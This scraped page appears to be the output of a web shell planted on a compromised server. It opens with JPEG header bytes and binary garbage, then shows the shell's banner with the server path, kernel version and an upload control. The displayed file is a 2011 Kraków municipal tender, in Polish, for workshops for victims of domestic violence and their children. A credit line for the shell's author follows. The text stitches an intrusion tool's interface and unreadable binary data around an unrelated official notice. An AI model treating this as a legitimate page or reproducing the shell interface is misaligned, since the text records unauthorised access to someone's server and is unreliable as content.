JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111119/386946-N-2011.html

<p class="kh_header"><b>Kraków: zorganizowanie i przeprowadzenie warsztatów dla osób dotkniętych problemem przemocy w rodzinie- beneficjentów projektu pora na aktywność</b><br>
<b>Numer ogłoszenia: 386946 - 2011; data zamieszczenia: 19.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie warsztatów dla osób dotkniętych problemem przemocy w rodzinie- beneficjentów projektu pora na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  warsztatów dla osób dotkniętych problemem przemocy w rodzinie - beneficjentów  projektu  Pora na aktywność., zgodnie z poniższymi wytycznymi:
1.	Usługa obejmuje przeprowadzenie zajęć dla osób dorosłych dotkniętych przemocą, zmotywowanych do podjęcia działań zmierzających do zapoczątkowania zmian w ich życiu, oraz zapewnienia opieki nad dziećmi uczestników warsztatów
2.	Ilość uczestników:
1)	Grupa I: osoby dorosłe dotknięte przemocą, zmotywowane do podjęcia działań zmierzających do zapoczątkowania zmian w ich życiu - nie więcej niż 8 osób dorosłych.
2)	Grupa II: dzieci w wieku  0,5-3 lat z rodzin dotkniętych przemocą - nie więcej niż 6 dzieci.
3)	Grupa III: dzieci w wieku 4-10 lat z rodzin dotkniętych przemocą - nie więcej niż 6 dzieci.
W warsztatach będą uczestniczyć 2 osoby ze strony Zamawiącego przebywające na warsztatach łącznie przez cały czas ich trwania, 
Uwaga
Informację na temat ostatecznej liczby uczestników Zamawiający przekaże na minimum 7 dni przed datą wyjazdu lub w momencie podpisania umowy, przy czym liczba uczestników nie przekroczy ilości wskazanej w specyfikacji.

3.	Sposób organizacji zajęć: zajęcia niestacjonarne obejmujące:
1)	zajęcia grupowe dla dorosłych - prowadzone w dwóch podgrupach liczących po 4 osoby, obejmujące:
a)	trening kompetencji społecznych, asertywnych zachowań, komunikacji interpersonalnej
b)	trening umiejętności społecznych dotyczący wzmacniania własnej wartości i skuteczności w działaniu
2)	indywidualne poradnictwo psychologiczne dla dorosłych (3 godziny poradnictwa na 1 osobę)
3)	zajęcia wspólne dla rodziców z dziećmi, obejmujące:
a)	trening kompetencji życiowych
b)	zajęcia antystresowe i relaksacyjne
4)	opieka nad dziećmi
a)	w trakcie zajęć osób dorosłych
b)	w trakcie zajęć wspólnych dorosłych z dziećmi
c)	w czasie umożliwiającym dotarcie osób dorosłych na zajęcia i powrót z nich
Szczegółowy program zajęć stanowi załącznik nr 1 do formularza ofertowego
4.	Liczba godzin zegarowych warsztatów dla każdego beneficjenta
a)	trening kompetencji społecznych, asertywnych zachowań, komunikacji interpersonalnej w wymiarze 14 godzin
b)	trening umiejętności społecznych dotyczący wzmacniania własnej wartości i skuteczności w działaniu w wymiarze 14,5 godziny
c)	indywidualne poradnictwo psychologiczne dla dorosłych (3 godziny poradnictwa na 1 osobę) w wymiarze 3 godzin na osobę (łącznie 24 godziny)
d)	trening kompetencji życiowych - 20 godzin
e)	zajęcia antystresowe i relaksacyjne - 1,5 godziny
f)	opieka nad dziećmi - 53 godziny

5.	Metodyka pracy:
1) Trening umiejętności społecznych, asertywnych zachowań, komunikacji interpersonalnej (zajęcia grupowe) 50 % czasu zajęć przeznaczona jest na trening asertywnych zachowań,  50 % czasu zajęć przeznaczona jest na trening z komunikacji interpersonalnej. Przynajmniej 70 % całego czasu trwania zajęć wymaga aktywnej pracy grupy. Zajęcia będą prowadzone metodami aktywnymi: dyskusja, wchodzenie w role, praca w grupie.
1)	Trening umiejętności społecznych, wzmacniania własnej wartości i skuteczności w działaniu (zajęcia grupowe): 80 % czasu zajęć przeznaczona jest na trening wzmacniania własnej wartości, 20 % czasu zajęć przeznaczona jest na trening skuteczności w działaniu. 100 % całego czasu trwania zajęć wymaga aktywnej pracy grupy. Zajęcia będą prowadzone metodami aktywnymi: dyskusja, praca w grupie.
2)	Poradnictwo specjalistyczne psychologiczne indywidualne.
3)	Zajęcia antystresowe i relaksacyjne (zajęcia grupowe) prowadzone na zakończenie dnia wspólne dla rodziców i dzieci: 100 % czasu zajęć grupy przeznaczona jest na zajęcia antystresowe i relaksacyjne oraz wymaga aktywnej pracy grupy. Zajęcia będą prowadzone metodami aktywnymi: praca w grupie.
4)	Trening kompetencji życiowych: prowadzony wspólnie dla rodziców i dzieci. 100% zajęć wymaga aktywnej pracy grupy.
5)	Opieka nad dziećmi z grup II, III: Harmonogram opieki nad dziećmi musi być równoległy do harmonogramu zajęć rodziców. Na  grupę II wymagany jest 1 opiekun. Na grupę III wymagany jest 1 opiekun. Zajęcia będą dostosowane do warunków pogodowych oraz możliwości dzieci Wykonawca zobowiązany jest do zabezpieczenia dla dzieci materiałów plastycznych, dydaktycznych, gier, sprzętu sportowego, wejściówek na zajęcia zorganizowane. Minimum 80 % czasu przeznaczonego na opiekę wykonawca przeznaczy na prowadzenie zajęć dla dzieci metodami aktywnymi z wykorzystaniem materiałów plastycznych, dydaktycznych, gier, sprzętu sportowego.
6.	Wykonawca zapewni
1)	odpowiednie warunki lokalowe do przeprowadzenia warsztatów i zalecane materiały szkoleniowe,
2)	możliwość organizacji czasu wolnego (np. dostęp do sali gimnastycznej, placu zabaw itp.),
3)	pokrycie kosztów  opłat parkingowych,
4)	opłatę klimatyczną,
5)	Uczestnicy wyjazdu zostaną ubezpieczeni od następstw nieszczęśliwych wypadków w trakcie przejazdów oraz w trakcie trwania wyjazdu oraz kosztów leczenia na kwotę nie mniejszą niż 10 000,00 PLN na każdego uczestnika. Wykonawca zobowiąże się do przedłożenia Zamawiającemu polisy - umowy ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu.
6)	dojazd uczestnikom warsztatów z siedziby Zamawiającego do miejsca   szkolenia i z powrotem własnymi lub udostępnionymi przez firmę  przewozową autokarami, zgodnie z obowiązującymi przepisami dot. przewozu osób.. Autokary mają  posiadać klimatyzację lub możliwość otwierania okien   Obowiązkiem przewoźnika jest posiadanie wymaganych przepisami dokumentów  m.in. licencji przewoźnika oraz podstawienie autokaru  sprawnego technicznie, posiadającego pełną dokumentacje gwarantującą  przejazd na trasie  określonej w umowie zgodnie z przepisami obowiązującymi  w Polsce, oraz posiadanie wymaganego ubezpieczenia. Kierowca jest zobowiązany do   dbania o czystość   autokaru podczas podróży, 
7)	posiłki - zgodnie z menu stanowiącym załącznik nr 2 do formularza ofertowego, 
8)	właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i          innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz             przepisów ustawy o Państwowej Inspekcji Sanitarnej,
9)	oznaczenia dokumentów wytworzonych w związku z realizacją zadania,             materiałów, pomieszczeń  w których odbywać się będą zajęcia itp., zgodnie z           wytycznymi oznaczania projektów POKL, zamieszczonymi na stronie            internetowej www.efs.gov.pl/ZPFE/Strony/Dokumenty.aspx,
10)	wydanie po zakończeniu realizacji usługi zaświadczeń oznakowanych zgodnie z              w/w   wytycznymi,
11)	dostarczenia uczestnikom I grupy atrakcyjnych (drukowanych w kolorze, stosujących różny formy przekazu - oprócz tekstu, np. ilustracje, wykresy itp.) materiałów dydaktycznych i publikacji (o objętości nie mniej niż 10 stron) 
z zakresu problemów dotyczących przemocy, w tym: cyklu przemocy, mitów na temat przemocy, mechanizmów obronnych stosowanych w sytuacji przemocy, zachowań dzieci wychowujących się w rodzinie dotkniętej przemocą, asertywnego zachowania, radzenia sobie ze stresem, wykazu instytucji świadczących pomoc rodzinie dotkniętej przemocą wraz z opisem form świadczonej pomocy
12)	materiały szkoleniowe dla każdego uczestnika warsztatów w tym:
a)	kompletu cienkopisów 4 w kolorach (czerwony, niebieski, zielony, czarny),
b)	długopisu metalowy typu Zenit,
c)	teczki tekturowej zamykanej lakierowanej, 
d)	zeszytu 30 kartkowy w kratkę,
e)	planu zajęć ,
f)	   skryptu zajęć dla każdego uczestnika zawierającego materiał omawiany na zajęciach, wskazówki, porady.
13)	opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka lub dowiezieniu uczestnika pobytu do przychodni/szpitala,
14)	prowadzenia dokumentacji fotograficznej usługi i przekazania jej na zakończenie całej usługi do Zamawiającego (w tym celu, w przypadku wykonawca zobowiązany jest zastosować przepisy prawa dot. zgody na udostępnienie wizerunku).   
15)	Rezydenta, dostępnego przez cały czas realizacji usługi.

7.	Warunki dodatkowe:
1)	podczas realizacji usługi Wykonawca zobowiązany jest do: 
a)	prowadzenia dziennika każdych zajęć zawierający listę obecności, wymiar godzin , tematy zajęć 
b)	potwierdzenia przez beneficjentów odbioru materiałów szkoleniowych , wyżywienia oraz skryptu.
2)	Wykonawca przedstawi szczegółowy program zajęć, oraz skrypt do akceptacji Zamawiającego  w terminie do 3 dni po podpisaniu umowy,
3)	Wykonawca  zachowa w tajemnicy wszelkie dane osobowe, do których uzyskał dostęp  w  związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy   o  ochronie danych osobowych,
4)	koszt pobytu pracowników Zamawiającego Wykonawca jest zobowiązany uwzględnić          w cenie oferty,
5)	Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez         Zamawiającego lub podmiot kontrolujący Zamawiającego,
6)	w pomieszczeniach, w których będą odbywać się zajęcia będzie panować temperatura         pokojowa,
7)	pokoje, w których będą zakwaterowani beneficjenci będą dla nich dostępne do momentu wyjazdu z ośrodka,
8)	Wykonawca przeprowadzi  ocenę skuteczności podjętych działań  w  odniesieniu  do  założonych celów, przedstawi je na spotkaniu podsumowującym, które zostanie zorganizowane przez Wykonawcę w zasobach lokalowych Zamawiającego w terminie 5 dni roboczych od daty zakończenia usługi. Podczas spotkania Wykonawca przekaże Zamawiającemu zgromadzoną dokumentację dotyczącą  prowadzenia całej usługi, tj.: listy obecności, kopie zaświadczeń wydanych beneficjentom, potwierdzenia odbioru materiałów piśmienniczych, wyżywienia oraz publikacji, dokumentacji fotograficznej z przebiegu realizacji usługi.

 II miejsce realizacji
Wymogi dotyczące realizacji miejsca zamówienia:
pensjonat/ośrodek wypoczynkowy, ośrodek szkoleniowy pensjonat, gospodarstwo agroturystyczne, w odległości do 150 km od Krakowa ( poza terenem gminy miejskiej Kraków), w miejscowości o charakterze turystyczno-wypoczynkowym,  dysponujący:
1)	stołówką w budynku zakwaterowania;
2)	pokojami 1, 2, 3, 4 osobowymi, z łazienkami wyposażonymi w natrysk i WC. Pokoje muszą być wyposażone w łóżka wraz z kompletem  pościeli, szafę, krzesła, stolik, ręczniki, wieszaki, szklanki lub kubki oraz szafki przy łóżkach.
3)	4 pokojami do zajęć indywidualnych, wyposażone co najmniej w 2 krzesła i stół
4)	2 salami do zajęć dla grupy I na min. 6 osób, wyposażonymi we flipczart z pisakami oraz papierem,  projektor multimedialny, 1 ryzę papieru białego A4 do drukarki, i możliwość wydrukowania lub kserowania materiałów do zajęć,
5)	1 salę do zajęć dal dzieci umożliwiające swobodne poruszanie się  wraz z wyposażeniem w zabawki, gry planszowe, materiały plastyczne i dydaktyczne, zestawem do oglądania filmów (telewizor, DVD i filmy dla dzieci),
6)	1 salę przystosowaną dla dzieci w wieku od 5 miesiąca życia do 2,5 lat wyposażoną w wykładzinę dywanową, 2 kojce, przewijak, łóżeczka do spania z pościelą, zabawki dostosowane do wieku dzieci.

III termin realizacji: od 20.12.2011 do 27.11.2011r
IV warunki płatności
1.	Wykonawca wystawi fakturę po zakończeniu zajęć i dostarczy ją niezwłocznie zamawiającemu. Do faktury Wykonawca dołączy rozliczenie kosztów usługi w podziale na instrumenty aktywnej integracji zgodnie z kalkulacją
2.	Wypłata wynagrodzenia nastąpi w terminie do 7 dni od daty przyjęcia przez Zamawiającego prawidłowo wystawionej faktury, przelewem na wskazany przez Wykonawcę rachunek bankowy. 
3.	Zamawiający wypłaci wynagrodzenie za faktycznie zrealizowaną usługę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki, w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 63.40.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełniają warunek posiadania uprawnienia do wykonywania określonej działalności lub czynności tj. Wykonawca lub jego podwykonawca  posiada wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami zdolnymi do wykonania zamówienia tj: 
1)	5 osobami prowadzącymi zajęcia dla dorosłych oraz zajęcia wspólne posiadającymi
a)	wykształcenie wyższe specjalność: psychologia kliniczna
b)	doświadczenie w pracy z rodzinami dotkniętymi przemocą lub  będącymi w kryzysie, w ilości co najmniej 30 godzin w tym co najmniej 20 godzin pracy z grupą metodami aktywnymi
2)	1 osobą do posiadającą:
a)	wykształcenie wyższe pedagogiczne na kierunku wychowanie przedszkolne
b)	doświadczenie w pracy z dziećmi w ilości co najmniej 45 godzin metodami aktywnymi
3)	1 osobą posiadającą:
a)	wykształcenie wyższe pedagogiczne lub przygotowanie pedagogiczne (zgodne z definicją zawartą w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli), lub ukończony kurs wychowawcy kolonijnego, lub ukończony kurs kierownika placówki wypoczynkowej.
b)	doświadczenie w pracy z dziećmi w ilości co najmniej 45 godzin metodami aktywnymi</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	warunków płatności,
b)	terminu realizacji usługi
c)	miejsca realizacji usługi
d)	podwykonawców</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakwo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Kraków ul.Józefińska 14 pok 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2011 godzina 10:00, miejsce: Dziennik Podawczy Miejskiego Ośrodka pomocy Społecznej w Krakwoie ul.Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> POKL Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com